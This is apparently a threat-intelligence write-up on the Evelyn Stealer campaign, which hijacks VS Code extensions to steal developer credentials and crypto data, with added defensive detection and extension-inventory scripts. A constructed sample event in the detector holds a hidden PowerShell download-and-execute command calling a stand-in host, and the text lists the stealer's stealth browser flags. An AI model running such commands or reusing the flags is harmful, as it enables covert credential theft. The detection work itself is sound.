CodeSteal: VS Code Extension Hijacking for Crypto and Credential Theft

Key Takeaways:

  • A new malware campaign, Evelyn Stealer, is targeting software developers by exploiting the Microsoft Visual Studio Code (VS Code) extension ecosystem.
  • The malware is designed to steal developer credentials, cryptocurrency-related data, browser cookies and other sensitive information from the compromised machine.
  • The campaign targets organizations with software development teams that rely on VS Code and third-party extensions.
  • The malware can also be used to gain access to broader organizational systems, including production systems, cloud resources, and digital assets.
  • Two new Python-based stealer malware families, MonetaStealer and SolyxImmortal, have also been discovered, with the former capable of targeting Apple macOS systems.

Introduction to Evelyn Stealer
The Evelyn Stealer malware campaign is a newly discovered threat that targets software developers by exploiting the VS Code extension ecosystem. The campaign is designed to steal developer credentials, cryptocurrency-related data and other sensitive information. Because a developer workstation typically holds tokens, keys and cloud credentials, a compromised development environment can serve as an access point to broader organizational systems, including production systems, cloud resources and digital assets. The campaign highlights the growing importance of securing developer environments and the need for organizations to take proactive measures against such threats.

Technical Details of Evelyn Stealer
The Evelyn Stealer malware is designed to be stealthy and evasive, using a variety of techniques to avoid detection. The malware is distributed through compromised VS Code extensions, which are then used to launch a malicious downloader DLL. This DLL launches a hidden PowerShell command to fetch and execute a second-stage payload, which decrypts and injects the main stealer payload into a legitimate Windows process. The malware then collects sensitive information, including clipboard content, installed apps, cryptocurrency wallets, running processes, desktop screenshots, stored Wi-Fi credentials, and system information. The malware also collects credentials and stored cookies from Google Chrome and Microsoft Edge, and implements safeguards to detect analysis and virtual environments.

Evasion Techniques Used by Evelyn Stealer
The Evelyn Stealer malware uses a variety of evasion techniques to avoid detection. To harvest browser data it launches the browser from the command line with flags such as --headless=new, --disable-gpu, --no-sandbox, --disable-extensions, --disable-logging, --silent-launch, --no-first-run, --disable-popup-blocking, --window-position=-10000,-10000 and --window-size=1,1. Taken in order, these flags run the browser in headless mode, prevent GPU acceleration, disable the browser's security sandbox, keep legitimate security extensions from interfering, disable browser log generation, suppress startup notifications, bypass the first-run setup dialogs, ensure the malicious content can execute without pop-up prompts, and position a 1x1-pixel window off-screen. The malware also creates a mutual exclusion (mutex) object so that only one instance runs on a compromised host at any given time.
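The two behaviours described above (a VS Code process spawning a hidden PowerShell download-and-execute command, and a browser started headless with its window pushed off-screen) are good candidates for process-creation detections. The following is an added example written for this article, not code from the article or from any vendor; it scores constructed process-creation events whose field names are an assumption modelled loosely on Sysmon's process-creation event. Individually, most of the listed flags are legitimate in automation and CI, so the rule keys on the combination of headless mode with the off-screen or 1x1 window rather than on any single flag.

```python
"""Detection logic (added example) for two behaviours the article attributes
to Evelyn Stealer.  Event records are constructed; the field names
("image", "parent_image", "command_line") are an assumption."""

import re

# The ten browser flags the article lists.
HEADLESS_FLAGS = {
    "--headless=new", "--disable-gpu", "--no-sandbox", "--disable-extensions",
    "--disable-logging", "--silent-launch", "--no-first-run",
    "--disable-popup-blocking", "--window-position=-10000,-10000",
    "--window-size=1,1",
}
BROWSERS = {"chrome.exe", "msedge.exe"}
VSCODE_IMAGES = {"code.exe"}                     # VS Code stable; Insiders build not covered here
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# -WindowStyle Hidden and its accepted abbreviations (-w, -win, -window)
PS_HIDDEN = re.compile(r"-w(?:in(?:dow(?:style)?)?)?\s+hidden", re.I)
# common fetch-and-execute verbs in PowerShell command lines
PS_FETCH_EXEC = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b",
    re.I)


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def browser_flags(command_line):
    """Set of '--' style flags on a command line (lower-cased)."""
    return {tok.lower() for tok in command_line.split() if tok.startswith("--")}


def headless_flag_overlap(command_line):
    """How many of the article's ten flags appear on this command line."""
    return len(browser_flags(command_line) & HEADLESS_FLAGS)


def check_event(ev):
    """Return the name of the matching rule, or None."""
    image = basename(ev["image"])
    parent = basename(ev["parent_image"])
    cmd = ev["command_line"]
    # Rule 1: VS Code -> hidden PowerShell that fetches and runs remote content
    if (image in POWERSHELL_IMAGES and parent in VSCODE_IMAGES
            and PS_HIDDEN.search(cmd) and PS_FETCH_EXEC.search(cmd)):
        return "hidden_powershell_from_vscode"
    # Rule 2: headless browser whose window is deliberately invisible
    if image in BROWSERS:
        flags = browser_flags(cmd)
        headless = "--headless=new" in flags or "--headless" in flags
        offscreen = ("--window-position=-10000,-10000" in flags
                     or "--window-size=1,1" in flags)
        if headless and offscreen:
            return "offscreen_headless_browser"
    return None


def analyze(events):
    """List of (event index, rule name) for every event that matches a rule."""
    return [(i, rule) for i, ev in enumerate(events) if (rule := check_event(ev))]


# Constructed sample events (hosts, URLs and paths are made up).
SAMPLE_EVENTS = [
    {   # 0: extension host launching a hidden download-and-run PowerShell -> rule 1
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
        "command_line": "powershell.exe -w hidden -nop -c \"iex ((New-Object Net.WebClient)"
                        ".DownloadString('https://stage2.example.invalid/p'))\"",
    },
    {   # 1: ordinary interactive Chrome start -> no alert
        "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"",
    },
    {   # 2: Edge started with all ten flags, window off-screen -> rule 2
        "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
        # placeholder parent: the article does not name the injected host process
        "parent_image": r"C:\Windows\System32\PLACEHOLDER-host.exe",
        "command_line": "msedge.exe --headless=new --disable-gpu --no-sandbox "
                        "--disable-extensions --disable-logging --silent-launch "
                        "--no-first-run --disable-popup-blocking "
                        "--window-position=-10000,-10000 --window-size=1,1",
    },
    {   # 3: VS Code running a visible local PowerShell task -> no alert
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
        "command_line": "powershell.exe -NoProfile -Command \"git status\"",
    },
    {   # 4: CI-style headless Chrome without the off-screen window -> no alert
        "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "parent_image": r"C:\ci\agent.exe",
        "command_line": "chrome.exe --headless=new --disable-gpu --screenshot "
                        "https://intranet.example.invalid/",
    },
]

if __name__ == "__main__":
    for idx, rule in analyze(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} (flag overlap {headless_flag_overlap(SAMPLE_EVENTS[idx]['command_line'])})")
```

The overlap count is reported alongside the rule name so an analyst can raise the bar (for example, require six or more of the ten flags) in environments where headless browsers are common. Events 3 and 4 are included to show that a visible PowerShell task from VS Code and a CI screenshot run do not fire.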

Other Malware Campaigns
In addition to the Evelyn Stealer campaign, two new Python-based stealer malware families, MonetaStealer and SolyxImmortal, have been discovered. MonetaStealer is capable of targeting Apple macOS systems, enabling comprehensive data theft. SolyxImmortal, on the other hand, leverages legitimate system APIs and widely available third-party libraries to extract sensitive user data and exfiltrate it to attacker-controlled Discord webhooks. The design of SolyxImmortal emphasizes stealth, reliability, and long-term access, rather than rapid execution or destructive behavior. By operating entirely in user space and relying on trusted platforms for command-and-control, the malware reduces its likelihood of immediate detection while maintaining persistent visibility into user activity.

Conclusion and Recommendations
The discovery of the Evelyn Stealer campaign and the emergence of new stealer malware families highlight the increasing importance of securing developer environments and protecting against such threats. Organizations should take proactive measures to protect themselves, including implementing robust security controls, monitoring developer environments for suspicious activity, and educating developers about the risks of malware and the importance of secure coding practices. Additionally, organizations should consider implementing measures to detect and prevent the use of compromised VS Code extensions, and to monitor for signs of malware activity. By taking these steps, organizations can reduce the risk of compromise and protect their sensitive information from theft.
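One concrete control behind the recommendation to detect unapproved VS Code extensions is an inventory of what is actually installed on developer machines, compared against an allowlist. The script below is an added example (not from the article, and not an official VS Code tool): it reads the package.json files that VS Code keeps under the extensions directory (by default ~/.vscode/extensions, one folder per extension) and reports anything not on the allowlist. The sample extension directory it builds is constructed in a temporary folder; the allowlist and version numbers are made up for the example.

```python
"""Added example: inventory installed VS Code extensions and report ones
that are not on an approved list.  The sample directory is constructed."""

import json
import tempfile
from pathlib import Path


def inventory_extensions(ext_dir):
    """Return {extension_id: version} for every <dir>/*/package.json found.

    VS Code installs each extension into its own folder containing a
    package.json with "publisher", "name" and "version" fields.
    """
    found = {}
    for pkg in Path(ext_dir).glob("*/package.json"):
        try:
            meta = json.loads(pkg.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            # unreadable or malformed manifest: report it rather than skip it
            found[f"<unreadable:{pkg.parent.name}>"] = None
            continue
        ext_id = f"{meta.get('publisher', '?')}.{meta.get('name', '?')}".lower()
        found[ext_id] = meta.get("version")
    return found


def unapproved(inventory, allowlist):
    """Sorted (extension_id, version) pairs that are installed but not allowed."""
    allowed = {ext.lower() for ext in allowlist}
    return sorted((ext, ver) for ext, ver in inventory.items() if ext not in allowed)


# Constructed allowlist for the example (two real extension ids).
SAMPLE_ALLOWLIST = {"ms-python.python", "esbenp.prettier-vscode"}


def build_sample_dir():
    """Constructed stand-in for ~/.vscode/extensions with three extensions."""
    root = Path(tempfile.mkdtemp(prefix="vscode-ext-"))
    samples = [  # (publisher, name, version) -- versions are made up
        ("ms-python", "python", "0.0.1-sample"),
        ("esbenp", "prettier-vscode", "0.0.2-sample"),
        ("example-publisher", "theme-helper", "0.0.3-sample"),  # not a real extension
    ]
    for publisher, name, version in samples:
        folder = root / f"{publisher}.{name}-{version}"
        folder.mkdir()
        (folder / "package.json").write_text(
            json.dumps({"publisher": publisher, "name": name, "version": version}),
            encoding="utf-8")
    return root


if __name__ == "__main__":
    ext_root = build_sample_dir()        # replace with Path.home() / ".vscode" / "extensions"
    inv = inventory_extensions(ext_root)
    for ext, ver in unapproved(inv, SAMPLE_ALLOWLIST):
        print(f"NOT APPROVED: {ext} {ver}")
```

On a real machine, point the script at the user's extensions directory (or at the output of `code --list-extensions --show-versions`, which lists the same identifiers) and feed the result into whatever ticketing or endpoint-management workflow the organization uses; the allowlist itself should be the set of extensions the organization has reviewed, not a copy of whatever is already installed.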
